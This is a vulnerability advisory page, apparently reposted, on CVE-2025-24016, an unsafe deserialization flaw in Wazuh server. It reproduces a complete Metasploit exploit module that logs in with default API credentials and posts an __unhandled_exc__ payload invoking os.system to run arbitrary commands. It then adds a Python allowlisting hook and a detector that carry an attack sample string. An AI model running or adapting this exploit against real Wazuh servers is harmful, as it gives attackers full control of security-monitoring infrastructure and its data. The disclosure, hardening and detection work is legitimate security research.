Wazuh server remote code execution caused by an unsafe deserialization vulnerability

Vulnerability information

Vulnerability name: Wazuh server remote code execution caused by an unsafe deserialization vulnerability

Vulnerability ID:

  • CVE: CVE-2025-24016

Vulnerability type: Deserialization

Severity: Critical

Vulnerability description: Wazuh is a free and open-source threat prevention, detection and response platform that is widely used for enterprise security monitoring; its rich functionality and flexibility have led to broad deployment worldwide. The vulnerability lies in the handling of Distributed API (DAPI) parameters on the Wazuh server: the as_wazuh_object function in framework/wazuh/core/cluster/common.py deserializes serialized JSON data without validating the input correctly, which results in unsafe deserialization. An attacker can craft data that abuses the __unhandled_exc__ marker to execute arbitrary Python code. The conditions for exploitation are relatively loose: any user with API access (including a compromised dashboard or a Wazuh server in the cluster), or in certain configurations even a compromised agent, can trigger it. Because the flaw allows remote code execution, an attacker can take full control of the affected system, with severe consequences such as data leakage and service disruption.

Vendor: Wazuh

Product: Wazuh

Affected versions: 4.4.0 <= version < 4.9.1

Source: https://github.com/rapid7/metasploit-framework/blob/639315452c843e5ae7f622fcf476200d322a716d/modules%2Fexploits%2Flinux%2Fhttp%2Fwazuh_auth_rce_cve_2025_24016.rb

Type: rapid7/metasploit-framework: GitHub issues

PoC details


```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability.',
        'Description' => %q{
          Wazuh is a free and open source platform used for threat prevention, detection, and response.
          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized
          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
          servers in the cluster) or, in certain configurations, even by a compromised agent.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
          'DanielFi https://github.com/DanielFi', # Discovery
        ],
        'References' => [
          ['CVE', '2025-24016'],
          ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
          ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-02-10',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 55000
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
      OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
      OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
    ])
  end

  # get Wazuh API token
  # return token if API login is successful else nil
  def get_api_token
    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
      'headers' => {
        'Authorization' => basic_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('token')

    res_json = res.get_json_document
    res_json['data']['token'] unless res_json.blank?
  end

  # get the Wazuh version
  # return version if successful else nil
  def get_wazuh_version(api_token)
    api_auth = "Bearer #{api_token}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => api_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('api_version')

    res_json = res.get_json_document
    res_json['data']['api_version'] unless res_json.blank?
  end

  # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
  def execute_command(cmd, _opts = {})
    # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
    post_data = {
      __unhandled_exc__:
      {
        __class__: 'os.system',
        __args__: [ cmd.to_s ]
      }
    }.to_json

    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
      'ctype' => 'application/json',
      'headers' => {
        'Authorization' => basic_auth.to_s
      },
      'data' => post_data.to_s
    })
  end

  def check
    # check Wazuh API access with the API credentials
    api_token = get_api_token
    return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?

    version = get_wazuh_version(api_token)
    return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?

    version = Rex::Version.new(version)
    unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
      return CheckCode::Safe("Wazuh version #{version}")
    end

    CheckCode::Appears("Wazuh version #{version}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    execute_command(payload.encoded)
  end
end
```
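A defensive counterpart to the deserialization described in the vulnerability description and to the `__unhandled_exc__` document the module's `execute_command` builds, added here as an example that is neither Wazuh's code nor the Metasploit module's: a `json.loads` object hook that accepts the marker only for an allowlisted set of built-in exception types and refuses dotted names such as `os.system`, plus a detection helper for logged request bodies. The allowlist, the function names and the sample payloads are assumptions; Wazuh's actual fix in 4.9.1 may differ.

```python
import builtins
import json

# Exception types a DAPI peer may legitimately forward (assumed allowlist).
ALLOWED_EXC = {"ValueError", "KeyError", "TimeoutError", "PermissionError"}


class UnsafeDeserialization(Exception):
    """Raised when a payload tries to resolve a callable outside the allowlist."""


def safe_as_wazuh_object(dct):
    """json.loads object_hook (hypothetical stand-in for Wazuh's as_wazuh_object):
    rebuild an allowlisted exception from the marker, refuse anything else."""
    if "__unhandled_exc__" not in dct:
        return dct
    spec = dct["__unhandled_exc__"]
    if not isinstance(spec, dict):
        raise UnsafeDeserialization("marker must carry an object")
    name = spec.get("__class__")
    args = spec.get("__args__", [])
    # A dotted path such as "os.system" is a module lookup, never an exception name.
    if not isinstance(name, str) or "." in name or name not in ALLOWED_EXC:
        raise UnsafeDeserialization(f"refused __class__={name!r}")
    cls = getattr(builtins, name)
    if not (isinstance(cls, type) and issubclass(cls, BaseException)):
        raise UnsafeDeserialization(f"{name} is not an exception type")
    if not isinstance(args, list) or not all(isinstance(a, (str, int, float)) for a in args):
        raise UnsafeDeserialization("exception args must be primitives")
    return cls(*args)


def decode(payload: str):
    """Decode a DAPI-style JSON document with the hardened hook."""
    return json.loads(payload, object_hook=safe_as_wazuh_object)


def is_malicious(payload: str) -> bool:
    """Detection helper for logged request bodies: True if the hook would refuse it."""
    try:
        decode(payload)
    except UnsafeDeserialization:
        return True
    except json.JSONDecodeError:
        return False
    return False


# Constructed samples: a legitimately forwarded exception and the CVE-2025-24016 shape.
LEGIT = '{"__unhandled_exc__": {"__class__": "ValueError", "__args__": ["bad agent id"]}}'
ATTACK = '{"__unhandled_exc__": {"__class__": "os.system", "__args__": ["cmd"]}}'
```

Running `is_malicious` over captured API request bodies flags the marker misuse before it reaches a deserializer; on a patched server the hook itself is the control.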



http://example.com/2025/07/16/github_2643827425/
Author: lianccc
Published: 16 July 2025